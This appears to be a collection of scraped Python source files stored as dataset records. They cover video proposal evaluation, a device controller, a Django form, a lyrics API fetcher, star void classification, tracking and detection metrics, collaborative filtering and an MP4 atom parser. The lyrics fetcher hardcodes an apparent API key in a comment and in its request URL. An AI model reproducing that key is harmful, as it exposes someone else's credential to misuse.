proposals.\n\n\nrecall_freq, tiou_thresholds_freq = prop_eval_utils.recall_freq_vs_tiou_thresholds(daps_results, ground_truth, frm_nums,\n pdefined_freq=freq)\n\n\n\n\nrecall_freq_pnt_file = \"./ref_pnt_pairs/{:s}_{:.2f}_recall_freq_pnt_pairs.npy\"\nnp.save(recall_freq_pnt_file.format(save_name, freq), np.array([tiou_thresholds_freq, recall_freq]))\n\n\n","sub_path":"Devs_ActionProp/PropEval/prop_eval_save2file_freq_only.py","file_name":"prop_eval_save2file_freq_only.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"184063569","text":"#!/usr/bin/env python3\nfrom controller import Controller\n\nclass Bkp1785bController(Controller):\n description = \"1785b Controller\"\n name = \"BKP 1785B\"\n devices = [\"bkp1785b\"]\n \n def add_args(self):\n self.parser.add_argument(\n \"-r\", \"--baud-rate\", default=None,\n required=True,\n help=\"baud rate (e.g. 9600).\")\n \ndef main():\n controller = Bkp1785bController()\n controller.loop()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bkp1785b_controller.py","file_name":"bkp1785b_controller.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"614177493","text":"'''\nCreated on 26 Nov 2013\n\n@author: christina\n'''\nfrom django import forms\n\nfrom app.jobs import models\n\nclass PostJobForm(forms.ModelForm):\n class Meta:\n model = models.JobPost\n fields = ['description', 'title', 'application_date', 'location',\n 'job_categories']\n\n def __init__(self, *args, **kwargs):\n super(PostJobForm, self).__init__(*args, **kwargs)\n \n self.fields['title'].widget.attrs.update({'class': 'required'})\n self.fields['application_date'].widget.attrs.update({'class': 'datepicker required'})\n self.fields['description'].widget.attrs.update({\n 'cols': '50', 'rows': '2',\n 'class': 'required'\n })\n","sub_path":"src/app/jobs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"33463428","text":"import numpy as np\n\n# Song.resp['foreign_ids'] is an array of dicts that are key:'foreign_id', value: 'musixmatch-WW:song:3957'\n# if 3957 is the ID of the song in musixmatch.\n\n# API Key: 3476eaa823bbdd8fc9b8fe89ee98c387\n\nLYRICS_BASE = 'http://api.musixmatch.com/ws/1.1/track.lyrics.get?apikey=3476eaa823bbdd8fc9b8fe89ee98c387'\n\ndef pull_lyrics(fids):\n\tif len(fids) == 0:\n\t\treturn []\n\n\tresponses = []\n\tfor f in fids:\n\t\tcode = int(f['foreign_id'].split(\":\")[-1])\n\t\tresponses.append(urllib2.urlopen(LYRICS_BASE+\"&track_id=\"+str(code)).read())\n\n\treturn responses","sub_path":"project/lyrics.py","file_name":"lyrics.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"430706851","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport plotPoints as pp\n\n#from scipy.spatial import Delaunay\n#import plotDelaunay\n\n# Se necesita fijar dos parámetros, una distancia epsilon y un número de\n# vecinos k. Dados estos parámetros, las estrellas se clasifican en tres\n# tipos:\n#\n# - Tipo centro: son las estrellas que tienen a una distancia <= epsilon a k\n# o más estrellas vecinas.\n#\n# - Tipo borde: son las estrellas que tienen a una distancia <= epsilon una\n# estrella de tipo centro, pero que no cumplen con la condición para ser de\n# tipo centro.\n#\n# - Tipo outlier: las estrellas que no son ni centro ni borde.\n#\n# Luego, las estrellas de tipo borde serían candidatos a ser parte de la\n# frontera a un vacío. Hay que pensar aún cómo construir las \"murallas de\n# los vacíos\". Una idea inicial sería hacer una triangulación y luego marcar\n# las aristas entre estrellas tipo borde, para definir los vacío.\n\ndef distance(x1,y1,x2,y2):\n \"distance between (x1,y1) and (x2,y2)\"\n deltaXSquare = (x1-x2)**2\n deltaYSquare = (y1-y2)**2\n return (deltaXSquare+deltaYSquare) ** (0.5)\n\nmanualEpsilon = False #Manual epsilon or calculated\nepsilon = 200 #epsilon is the distance to check for neighbours\nk = 12 #k is the number on the epsilon-neighborhood criterion\nfile = 'Data/20irr2d_1024.dat' #File to be read\nplot = True #Plot?\nplotNearestNeighbour = True #Plot lines to epsilon-neighbours?\n\n#Parse de read data\nf = open(file, 'r')\ni = 0\nfirst = 0\nfor r in f:\n if first == 0:\n dimensions = int(r)\n first += 1\n elif first == 1:\n l = int(r)\n first += 1\n raw = np.zeros((l,2))\n else:\n row = r.split()\n raw[i,0] = float(row[0])\n raw[i,1] = float(row[1])\n i += 1\n\n\nM = np.zeros((l, l))\n\n#Filling distance Matrix M\nfor i in range(0,l):\n for j in range(0,i):\n dist = distance(raw[i,0],raw[i,1],raw[j,0],raw[j,1])\n M[i,j] = dist\n M[j,i] = dist\n\n\n#calculate epsilon depending on k: epsilon is de mean distance of the kth neighbour.\ndef epsilonForK(k,M,l):\n kNearest = []\n for i in range(0,l):\n kNearest.append(sorted(M[i])[k+1])\n return np.mean(kNearest)\n\nif not manualEpsilon:\n epsilon = epsilonForK(k,M,l)\n\n#Ids\ncenter = []\noutlier = []\ncandidates = []\nborder = []\n\ncenterPointsPython = []\noutlierPointsPython = []\ncandidatesPointsPython = []\nborderPointsPython = []\n\nneighbourEdge_points = []\nneighbour_edges = set()\n\ndef add_edge(i, j):\n \"\"\"Add a line between the i-th and j-th points, if not in the list already\"\"\"\n if (i, j) in neighbour_edges or (j, i) in neighbour_edges:\n return\n neighbour_edges.add((i, j))\n neighbourEdge_points.append(raw[ [i, j] ])\n\n#check for center objects.\nfor i in range(0,l):\n nrNeigh = 0\n for j in range(0,l):\n if (M[i,j] <= epsilon) and i != j:\n nrNeigh += 1\n if plotNearestNeighbour:\n add_edge(i,j)\n if nrNeigh >= k:\n centerPointsPython.append(raw[i].tolist())\n center.append(i)\n else:\n candidates.append(i)\n candidatesPointsPython.append(raw[i].tolist())\n\n#Move candidates from outlier to border\nfor cand in candidates:\n wasBorder = False\n for c in center:\n if M[cand,c] <= epsilon:\n border.append(cand)\n borderPointsPython.append(raw[cand].tolist())\n wasBorder = True\n break\n if not wasBorder:\n outlier.append(cand)\n outlierPointsPython.append(raw[cand].tolist())\n\nif plot:\n plotName = 'Data:' + file + ' | epsilon:' + str(epsilon) + ' | k:' + str(k)\n if plotNearestNeighbour:\n pp.plotWithEpsilonNeighbour(plotName, centerPointsPython, outlierPointsPython, borderPointsPython,neighbourEdge_points)\n else:\n pp.plot(plotName, centerPointsPython, outlierPointsPython, borderPointsPython)\n","sub_path":"Voidfinding/Ordered.py","file_name":"Ordered.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"441026581","text":"import os\nimport numpy as np\nimport sys\nfrom scipy.optimize import linear_sum_assignment as linear_assignment\nfrom utils.utils import dict_to_list, bbox_overlap\n\ndef bilateral_weights(arr, gamma_col=12, gamma_pos=17):\n \n w_step = int(arr.shape[0]/2)\n delta_c = abs(arr[w_step*2,w_step*2] - arr)/3\n coordx, coordy = np.meshgrid(np.arange(-w_step,w_step+1),np.arange(-w_step,w_step+1))\n delta_g = np.sqrt(coordx ** 2 + coordy ** 2)\n weights = np.exp(-(delta_c)/gamma_col) * np.exp(-(delta_g)/gamma_pos)\n\n return weights.flatten()\n\ndef dist_func(vec1, vec2, metric='ssd', weights=None):\n \"\"\"\n Compute global distance between two vectors\n :param vec1, vec2: Two vectors\n :return: Computed distance\n \"\"\"\n assert len(vec1) == len(vec2)\n if weights is None:\n weights = np.ones(vec1.shape)*(1/vec1.size)\n\n if metric in 'ssd':\n # Sum of Squared Distances\n return sum(weights*(vec1 - vec2) ** 2)\n\n elif metric in 'sad':\n # Sum of Absolute Distances\n return sum(np.abs(weights*(vec1 - vec2)))\n\n elif metric in 'ncc':\n #Normalized Cross Correlation\n mean1 = np.sum(weights * vec1)\n mean2 = np.sum(weights * vec2)\n std1 = np.sqrt(np.sum(weights * (vec1 - mean1) ** 2))+(1e-15)\n std2 = np.sqrt(np.sum(weights * (vec2 - mean2) ** 2))+(1e-15)\n return np.sum(weights*(vec1-mean1)*(vec2-mean2))/(std1*std2)\n\ndef vec_error(gt, det, nchannel=2):\n \"\"\"\n Computes vectorial distance \n :param gt: Ground truth vectors\n :param det: Detection vectors\n :return: Computed error\n \"\"\"\n dist = det[:, :, :nchannel] - gt[:, :, :nchannel]\n error = np.sqrt(np.sum(dist ** 2, axis=2))\n\n # discard vectors which from occluded areas (occluded = 0)\n non_occluded_idx = gt[:, :, 2] != 0\n\n return error[non_occluded_idx], error\n\n\ndef compute_MSEN_PEPN(gt=None, det=None, error_noc=None, nchannel=2, th=3):\n \"\"\"\n Computes the error using the vectorial distance between gt and det\n :param gt: Ground truth values\n :param det: Detection values\n :param nchannel: Number of channels per frame\n :param op: mse or pep error computation\n :param th: threshold value to consider a distance as an error. \n \"\"\"\n\n if error_noc is None:\n assert gt is not None, 'gt is None'\n assert det is not None, 'det is None'\n error_noc, error = vec_error(gt, det, nchannel)\n\n msen = np.mean(error_noc)\n pepn = np.sum(error_noc > th) / len(error_noc)\n\n return msen, pepn, error\n\ndef interpolate_bb(bb_first, bb_last, distance):\n bb_first = np.array(bb_first)\n bb_last = np.array(bb_last)\n #interpolate new bbox depending on de distance in frames between first and last bbox\n new_bb = bb_first + (bb_last-bb_first)/distance\n\n return list(np.round(new_bb,2))\n\ndef compute_iou(bb_gt, bb, resize_factor=1):\n \"\"\" \n iou = compute_iou(bb_gt, bb)\n Compute IoU between bboxes from ground truth and a single bbox.\n bb_gt: Ground truth bboxes\n Array of (num, bbox), num:number of boxes, bbox:(xmin,ymin,xmax,ymax)\n bb: Detected bbox\n Array of (bbox,), bbox:(xmin,ymin,xmax,ymax)\n \"\"\"\n\n # intersection\n bb = bb / resize_factor\n\n ixmin = np.maximum(bb_gt[:, 0], bb[0])\n iymin = np.maximum(bb_gt[:, 1], bb[1])\n ixmax = np.minimum(bb_gt[:, 2], bb[2])\n iymax = np.minimum(bb_gt[:, 3], bb[3])\n iw = np.maximum(ixmax - ixmin + 1., 0.)\n ih = np.maximum(iymax - iymin + 1., 0.)\n inters = iw * ih\n\n # union\n uni = ((bb[2] - bb[0] + 1.) * (bb[3] - bb[1] + 1.) +\n (bb_gt[:, 2] - bb_gt[:, 0] + 1.) *\n (bb_gt[:, 3] - bb_gt[:, 1] + 1.) - inters)\n\n return inters / uni\n\ndef compute_miou(gt_frame, dets_frame, resize_factor=1):\n \"\"\"\n Computes the mean iou by averaging the individual iou results.\n :param gt_frame: Ground truth bboxes\n :param dets_frame: list of detected bbox for each frame\n :return: Mean Intersection Over Union value, Standard Deviation of the IoU\n \"\"\"\n iou = []\n for det in dets_frame:\n iou.append(np.max(compute_iou(gt_frame, det, resize_factor)))\n\n return np.mean(iou), np.std(iou)\n\ndef compute_centroid(bb, resize_factor=1):\n \"\"\"\n Computes centroid of bb\n :param bb: Detected bbox\n :return: Centroid [x,y] \n \"\"\"\n # intersection\n bb = np.array(bb) / resize_factor\n # (xmax - xmin) / 2 \n x = (bb[2] + bb[0]) / 2\n # (ymax - ymin) / 2 \n y = (bb[3] + bb[1]) / 2\n \n return (int(x), int(y))\n\ndef compute_total_miou(gt, dets, frames):\n \"\"\"\n Computes miou for every frame being evaluated.\n :param gt: Ground truth bboxes \n :param dets: list of detected bbox \n :param frames: Frames names \n return: Return the total moiu for the given sequence by averaging the resutls\n \"\"\"\n\n miou = np.empty(0, )\n\n for frame in frames:\n if os.name == 'nt':\n frame = frame.replace(os.sep, '/')\n frame_id = (frame.split('/')[-1]).split('.')[0]\n\n if frame_id in gt.keys() and frame_id in dets.keys() and int(frame_id) > 210:\n gt_frame = np.array(dict_to_list(gt[frame_id], False))\n dets_frame = np.array(dict_to_list(dets[frame_id], False))\n\n miou = np.hstack((miou, compute_miou(gt_frame, dets_frame)[0]))\n\n return (np.sum(miou) / len(miou))\n\ndef voc_ap(rec, prec, use_07_metric=False):\n \"\"\" ap = voc_ap(rec, prec, [use_07_metric])\n Compute VOC AP given precision and recall.\n If use_07_metric is true, uses the\n VOC 07 11 point method (default:False).\n \"\"\"\n if use_07_metric:\n # 11 point metric\n ap = 0.\n for t in np.arange(0., 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.\n else:\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.], rec, [1.]))\n mpre = np.concatenate(([0.], prec, [0.]))\n\n # compute the precision envelope\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\ndef voc_eval(recs,\n imagenames,\n dets,\n classname='car',\n ovthresh=0.5,\n resize_factor=1,\n use_07_metric=False):\n \"\"\"rec, prec, ap = voc_eval(recs,\n imagenames,\n dets,\n classname,\n [ovthresh],\n [use_07_metric])\n Top level function that does the PASCAL VOC evaluation.\n gt_dir: Path to ground truth\n det_dir: Path to detections\n img_dir: Path to images\n det_model : Detection model name\n Name of the txt file where detections are written\n classname: Category name (car)\n [ovthresh]: Overlap threshold (default = 0.5)\n [use_07_metric]: Whether to use VOC07's 11 point AP computation\n (default False)\n \"\"\"\n # assumes detections are in detpath.format(classname)\n # assumes annotations are in annopath.format(imagename)\n # assumes imagesetfile is a text file with each line an image name\n\n # extract gt objects for this class\n class_recs = {}\n npos = 0\n for imagename in imagenames:\n if os.name == 'nt':\n imagename = imagename.replace(os.sep, '/')\n\n imgname = (imagename.split('/')[-1]).split('.')[0]\n try:\n R = [obj for obj in recs[imgname] if obj['name'] == classname]\n except:\n continue\n bbox = np.array([x['bbox'] for x in R])\n det = [False] * len(R)\n npos += len(R)\n class_recs[imgname] = {'bbox': bbox,\n 'det': det}\n\n image_ids = [frame for frame, objs in dets.items() for _ in objs if frame in class_recs.keys()]\n confidence = np.array(\n [obj['confidence'] for frame, objs in dets.items() for obj in objs if frame in class_recs.keys()])\n BB = np.array([obj['bbox'] for frame, objs in dets.items() for obj in objs if frame in class_recs.keys()])\n\n # sort by confidence\n sorted_ind = np.argsort(-confidence)\n sorted_scores = np.sort(-confidence)\n BB = BB[sorted_ind]\n image_ids = [image_ids[x] for x in sorted_ind]\n\n # go down dets and mark TPs and FPs\n nd = len(image_ids)\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n for d in range(nd):\n R = class_recs[image_ids[d]]\n bb = BB[d, :].astype(float)\n ovmax = -np.inf\n BBGT = R['bbox'].astype(float)\n\n if BBGT.size > 0:\n # compute overlaps\n overlaps = compute_iou(BBGT, bb, resize_factor)\n\n ovmax = np.max(overlaps)\n jmax = np.argmax(overlaps)\n\n if ovmax > ovthresh:\n if not R['det'][jmax]:\n tp[d] = 1.\n R['det'][jmax] = 1\n else:\n fp[d] = 1.\n else:\n fp[d] = 1.\n\n # compute precision recall\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n rec = tp / float(npos)\n # avoid divide by zero in case the first detection matches a difficult\n # ground truth\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n ap = voc_ap(rec, prec, use_07_metric)\n\n return rec, prec, ap\n\ndef IDF1(gtDB, stDB, threshold = 0.5):\n \"\"\"\n compute IDF1 metric\n :param gtDB: list with the information of the detections in gt\n :param stDB: list with the information of the detections predicted\n :param threshold: thr to determine if the prediction is FP or FN\n :return: IDF1 (in %)\n \"\"\"\n st_ids = np.unique(stDB[:, 1])\n gt_ids = np.unique(gtDB[:, 1])\n n_st = len(st_ids)\n n_gt = len(gt_ids)\n groundtruth = [gtDB[np.where(gtDB[:, 1] == gt_ids[i])[0], :]\n for i in range(n_gt)]\n prediction = [stDB[np.where(stDB[:, 1] == st_ids[i])[0], :]\n for i in range(n_st)]\n cost = np.zeros((n_gt + n_st, n_st + n_gt), dtype=float)\n cost[n_gt:, :n_st] = sys.maxsize # float('inf')\n cost[:n_gt, n_st:] = sys.maxsize # float('inf')\n\n fp = np.zeros(cost.shape)\n fn = np.zeros(cost.shape)\n # cost matrix of all trajectory pairs\n cost_block, fp_block, fn_block = cost_between_gt_pred(\n groundtruth, prediction, threshold)\n\n cost[:n_gt, :n_st] = cost_block\n fp[:n_gt, :n_st] = fp_block\n fn[:n_gt, :n_st] = fn_block\n\n # computed trajectory match no groundtruth trajectory, FP\n for i in range(n_st):\n cost[i + n_gt, i] = prediction[i].shape[0]\n fp[i + n_gt, i] = prediction[i].shape[0]\n\n # groundtruth trajectory match no computed trajectory, FN\n for i in range(n_gt):\n cost[i, i + n_st] = groundtruth[i].shape[0]\n fn[i, i + n_st] = groundtruth[i].shape[0]\n try:\n matched_indices = linear_assignment(cost)\n except:\n import pdb\n pdb.set_trace()\n nbox_gt = sum([groundtruth[i].shape[0] for i in range(n_gt)])\n nbox_st = sum([prediction[i].shape[0] for i in range(n_st)])\n\n IDFP = 0\n IDFN = 0\n for matched in zip(*matched_indices):\n IDFP += fp[matched[0], matched[1]]\n IDFN += fn[matched[0], matched[1]]\n IDTP = nbox_gt - IDFN\n assert IDTP == nbox_st - IDFP\n # IDF1 = 2 * IDTP / (2 * IDTP + IDFP + IDFN)\n IDF1 = 2 * IDTP / (nbox_gt + nbox_st) * 100\n\n return IDF1\n\ndef corresponding_frame(traj1, len1, traj2, len2):\n \"\"\"\n Find the matching position in traj2 regarding to traj1\n Assume both trajectories in ascending frame ID\n :param traj1, traj2: trajectories (gt and estimated, respectively)\n :return: the location of the bbox in the new frame \n \"\"\"\n p1, p2 = 0, 0\n loc = -1 * np.ones((len1, ), dtype=int)\n while p1 < len1 and p2 < len2:\n if traj1[p1] < traj2[p2]:\n loc[p1] = -1\n p1 += 1\n elif traj1[p1] == traj2[p2]:\n loc[p1] = p2\n p1 += 1\n p2 += 1\n else:\n p2 += 1\n return loc\n\ndef cost_between_trajectories(traj1, traj2, threshold):\n \"\"\"\n Compute the FP and FN matchings\n :param traj1, traj2: trajectories (gt and estimated, respectively)\n :param threshold: threshold used to determine if it is FP or FN\n :return: number of FP and FN\n \"\"\"\n [npoints1, dim1] = traj1.shape\n [npoints2, dim2] = traj2.shape\n # find start and end frame of each trajectories\n start1 = traj1[0, 0]\n end1 = traj1[-1, 0]\n start2 = traj2[0, 0]\n end2 = traj2[-1, 0]\n\n # check frame overlap\n has_overlap = max(start1, start2) < min(end1, end2)\n if not has_overlap:\n fn = npoints1\n fp = npoints2\n return fp, fn\n\n # gt trajectory mapping to st, check gt missed\n matched_pos1 = corresponding_frame(\n traj1[:, 0], npoints1, traj2[:, 0], npoints2)\n # st trajectory mapping to gt, check computed one false alarms\n matched_pos2 = corresponding_frame(\n traj2[:, 0], npoints2, traj1[:, 0], npoints1)\n dist1 = compute_distance(traj1, traj2, matched_pos1)\n dist2 = compute_distance(traj2, traj1, matched_pos2)\n # FN\n fn = sum([1 for i in range(npoints1) if dist1[i] < threshold])\n # FP\n fp = sum([1 for i in range(npoints2) if dist2[i] < threshold])\n return fp, fn\n\ndef compute_distance(traj1, traj2, matched_pos):\n \"\"\"\n Compute the loss hit in traj2 regarding to traj1\n :param traj1, traj2: trajectories (gt and estimated, respectively)\n :param matched_pos: positions matched\n :return: the loss hit between both trajectories\n \"\"\"\n distance = np.zeros((len(matched_pos), ), dtype=float)\n for i in range(len(matched_pos)):\n if matched_pos[i] == -1:\n continue\n else:\n iou = bbox_overlap(traj1[i, 2:6], traj2[matched_pos[i], 2:6])\n distance[i] = iou\n return distance\n\ndef cost_between_gt_pred(groundtruth, prediction, threshold):\n \"\"\"\n Compute cost between detections in gt and in prediction\n :param groundtruth: ft information\n :param prediction: predicted information\n :param threshold: thr used to determine if FP or FN\n :return: the cost, FP and FN\n \"\"\"\n n_gt = len(groundtruth)\n n_st = len(prediction)\n cost = np.zeros((n_gt, n_st), dtype=float)\n fp = np.zeros((n_gt, n_st), dtype=float)\n fn = np.zeros((n_gt, n_st), dtype=float)\n for i in range(n_gt):\n for j in range(n_st):\n fp[i, j], fn[i, j] = cost_between_trajectories(\n groundtruth[i], prediction[j], threshold)\n cost[i, j] = fp[i, j] + fn[i, j]\n return cost, fp, fn","sub_path":"Week4/src/utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":14877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"541124236","text":"import math\nfrom operator import *\nfrom collections import defaultdict\n\n\ndef defItemIndex(DictUser):\n DictItem={}\n ##遍历每个用户\n for user, item_s in DictUser.items(): # 对每一个用户和他购买的物品们\n for each_item in item_s: # 对该用户购买过的每一个物品\n if each_item not in DictItem:\n DictItem[each_item] = set() # 字典中的集合,索引为物品,里层集合内容为用户们\n DictItem[each_item].add(user)\n return DictItem\n\n\ndef defUserSimilarity(DictItem):\n # calculate co-rated items between users\n C = dict()\n N = defaultdict(int) # 记录用户购买商品数\n for i, users in DictItem.items():\n for u in users:\n N[u]+=1\n for v in users:\n if u == v:\n continue\n C.setdefault(u, defaultdict(int))\n C[u][v] += 1\n # calculate finial similarity matrix W\n for u, related_users in C.items():\n for v, cuv in related_users.items():\n C[u][v] = cuv / math.sqrt (N[u] * N[v])\n return C[u][v]\n\n\ndef Recommend(user,train,W2,K):\n rank = dict()\n interacted_items = train[user]\n for v, wuv in sorted(W2[user].items, key=itemgetter(1), reverse=True)[:K]:\n for i, rvi in train[v].items:\n if i in interacted_items:\n continue\n rank[i] += wuv * rvi\n return rank\n\n\nif __name__ == '__main__':\n Train_Data = {'A':{'i1':1,'i2':1 ,'i4':1},\n 'B':{'i1':1,'i4':1},\n 'C':{'i1':1,'i2':1,'i5':1},\n 'D':{'i2':1,'i3':1},\n 'E':{'i3':1,'i5':1},\n 'F':{'i2':1,'i4':1}\n }\n Ditem=defItemIndex(Train_Data)\n print(Ditem)\n W=defUserSimilarity(Ditem)\n print(W)\n print(Recommend('D',Train_Data,W,2))\n","sub_path":"CuiLinClass/MyCode/BaseOnUser.py","file_name":"BaseOnUser.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"490099715","text":"import os\nimport struct\n\nFLAG_PRINT_DESC = 0x01\nFLAG_PRINT_SIZE_INFO = 0x02\n\ng_printLvlTab = ' '\ng_printFlags = 0x00\ng_maxLevel = 100\ng_leafInfo = False\ng_trackType = None\ng_listLimit = 10\n\n# tags = [isLeaf (True/False), isFullBoxType (True/False), desc]\ntags = {\n 'ftyp' : [True, False, 'file type and compatibility'],\n 'pdin' : [True, False, 'progressive download information'],\n 'moov' : [False, False, 'container for all metadata'],\n 'mvhd' : [True, True, 'movie header, overall declarations'],\n 'trak' : [False, False, 'container for an individual track or stream'],\n 'tkhd' : [True, True, 'track header, overall information about the track'],\n 'tref' : [True, False, 'track reference container'],\n 'edts' : [False, False, 'edit list container'],\n 'elst' : [True, False, 'an edit list'],\n 'mdia' : [False, False, 'container for the media information in a track'],\n 'mdhd' : [True, True, 'meadia header, overall information about the media'],\n 'hdlr' : [True, True, 'handler, declares the media (handler) type'],\n 'minf' : [False, False, 'media information container'],\n 'vmhd' : [True, True, 'video media header, overall information (video track only)'],\n 'smhd' : [True, True, 'sound media header, overall information (sound track only)'],\n 'hmhd' : [True, True, 'hint media header, overall information (hint track only)'],\n 'nmhd' : [True, True, 'null media header, overall information (some tracks only)'],\n 'dinf' : [False, False, 'data information box, container'],\n 'dref' : [True, True, 'data reference box, declares source(s) of media data in track'],\n 'stbl' : [False, False, 'sample table box, container for the time/space map'],\n 'stsd' : [True, True, 'sample descriptions (codec types, initialization etc.)'],\n 'stts' : [True, True, '(decoding) time-to-sample'],\n 'ctts' : [True, True, '(composition) time to sample'],\n 'stsc' : [True, True, 'sample-to-chunk, partial data-offset information'],\n 'stsz' : [True, True, 'sample sizes (framing)'],\n 'stz2' : [True, True, 'compact sample sizes (framing)'],\n 'stco' : [True, True, 'chunk offset, partial data-offset information'],\n 'co64' : [True, True, '64-bit chunk offset'],\n 'stss' : [True, True, 'sync sample table (random access points)'],\n 'stsh' : [True, False, 'shadow sync sample table'],\n 'padb' : [True, False, 'sample padding bits'],\n 'stdp' : [True, False, 'sample degradation priority'],\n 'sdtp' : [True, False, 'independent and siposable samples'],\n 'sbgp' : [True, False, 'sample-to-group'],\n 'sgpd' : [True, False, 'sample group description'],\n 'subs' : [True, False, 'sub-sample information'],\n 'mvex' : [False, False, 'movie extends box'],\n 'mehd' : [True, False, 'movie extends header box'],\n 'trex' : [True, False, 'track extends defaults'],\n 'ipmc' : [True, False, 'IPMP control box'],\n 'moof' : [False, False, 'movie fragment'],\n 'mfhd' : [True, False, 'movie fragment header'],\n 'traf' : [False, False, 'track fragment'],\n 'tfhd' : [True, False, 'track fragment header'],\n 'trun' : [True, False, 'track fragment run'],\n 'mfra' : [False, False, 'movie fragment random access'],\n 'tfra' : [True, False, 'track fragment random access'],\n 'mfro' : [True, False, 'movie fragment random access offset'],\n 'mdat' : [True, False, 'media data container'],\n 'free' : [True, False, 'free space'],\n 'skip' : [False, False, 'free space'],\n 'udta' : [False, False, 'user-data'],\n 'cprt' : [True, False, 'copyright etc.'],\n 'meta' : [False, False, 'metadata'],\n 'iloc' : [True, False, 'item location'],\n 'ipro' : [False, False, 'item protection'],\n 'sinf' : [False, False, 'protection scheme information box'],\n 'frma' : [True, False, 'original format box'],\n 'imif' : [True, False, 'IPMP information box'],\n 'schm' : [True, False, 'scheme type box'],\n 'schi' : [True, False, 'scheme information box'],\n 'iinf' : [True, False, 'item information'],\n 'xml ' : [True, False, 'XML container'],\n 'bxml' : [True, False, 'binary XML container'],\n 'pitm' : [True, False, 'primary item reference']\n}\n\ndef IsLeafAtom(atom):\n if not IsKnownAtom(atom):\n return True\n\n return tags[atom[0]][0]\n\ndef IsKnownAtom(atom):\n return (atom[0] in tags)\n\ndef GetAtomDesc(atom):\n return tags[atom[0]][2]\n\ndef ReadAtomFromFile(f, start, end):\n f.seek(start, os.SEEK_SET)\n if f.tell() != start:\n return\n\n buf = f.read(4)\n if len(buf) < 4:\n return\n size = struct.unpack('>I', buf)[0]\n\n tag = f.read(4)\n if len(tag) < 4:\n return\n\n if size == 0:\n size = end - f.tell()\n elif size == 1:\n buf = f.read(8)\n if len(buf) < 8:\n return\n size = struct.unpack('>Q', buf)[0] - 16\n else:\n size -= 8\n\n if tag == 'uuid ':\n usertype = f.read(16)\n if len(usertype) < 16:\n return\n tag += ':' + usertype\n size -= 16\n\n startPtr = f.tell()\n endPtr = startPtr + size\n return [tag, startPtr, endPtr]\n\ndef ReadAtomFromBuf(buf, start, end):\n dataLen = start\n\n b = buf[dataLen:dataLen+4]\n if len(b) < 4:\n return\n size = struct.unpack('>I', b)[0]\n\n dataLen += 4\n tag = buf[dataLen: dataLen+4]\n if len(tag) < 4:\n return\n\n dataLen += 4\n if size == 0:\n size = end - dataLen\n elif size == 1:\n b = buff[dataLen : dataLen + 8]\n if len(b) < 8:\n return\n size = struct.unpack('>Q', b)[0] - 16\n dataLen += 8\n else:\n size -= 8\n\n startPtr = dataLen\n endPtr = startPtr + size\n return [tag, startPtr, endPtr]\n\ndef GetAtomSize(atom):\n [tag, startPtr, endPtr] = atom\n\n size = endPtr - startPtr\n if size > 4294967295:\n size += 8\n\n size += 8\n\n if tag[0:4] == 'uuid':\n size += 16\n\n return size\n\ndef ReadSameLvlAtoms(f, start, end):\n pos = start\n\n atoms = []\n while pos < end:\n atom = ReadAtomFromFile(f, pos, end)\n if atom == None:\n return atoms\n\n pos += GetAtomSize(atom[:3])\n atoms.append(atom)\n\n return atoms\n\ndef ReadRecursiveAtoms(f, start, end):\n rootAtoms = ReadSameLvlAtoms(f, start, end)\n\n if rootAtoms == None:\n return []\n\n for atom in rootAtoms:\n if IsKnownAtom(atom) and (not IsLeafAtom(atom)):\n atom.append(ReadRecursiveAtoms(f, atom[1], atom[2]))\n\n return rootAtoms\n\ndef FindTagInAtomList(tag, atomList):\n atoms = []\n for atom in atomList:\n if atom[0] == tag:\n atoms.append(atom)\n else:\n if len(atom) > 3:\n atoms += FindTagInAtomList(tag, atom[3])\n return atoms\n\ndef PrintAtomHeadOnLvl(lvl, atom):\n\n printStr = lvl*g_printLvlTab + atom[0]\n\n if g_printFlags & FLAG_PRINT_SIZE_INFO:\n hdrLen = GetAtomSize(atom[:3]) - atom[2] + atom[1]\n printStr += ' [{0}:{1}][{2}:{3}]'.format(atom[1]-hdrLen, atom[1]-1, atom[1], atom[2]-1)\n\n if g_printFlags & FLAG_PRINT_DESC:\n if IsKnownAtom(atom):\n printStr += ' (' + GetAtomDesc(atom) + ')'\n else:\n printStr += ' ()'\n\n\n print(printStr)\n\ndef AnalyzeAtomLstOnLvl(lvl, atomLst, f):\n global g_maxLevel\n\n if lvl >= g_maxLevel:\n return\n\n for atom in atomLst:\n PrintAtomHeadOnLvl(lvl, atom)\n if len(atom) > 3:\n AnalyzeAtomLstOnLvl(lvl+1, atom[3], f)\n else:\n if g_leafInfo:\n info = ReadLeafAtomInfo(f, atom)\n PrintLeafAtomInfo(lvl+1, info)\n\ndef TrimAtomList(atomList, trimTags):\n if len(trimTags) == 0:\n return\n\n rmAtomList = []\n for atom in atomList:\n if atom[0] in trimTags:\n rmAtomList.append(atom)\n if len(atom) > 3:\n TrimAtomList(atom[3], trimTags)\n\n for atom 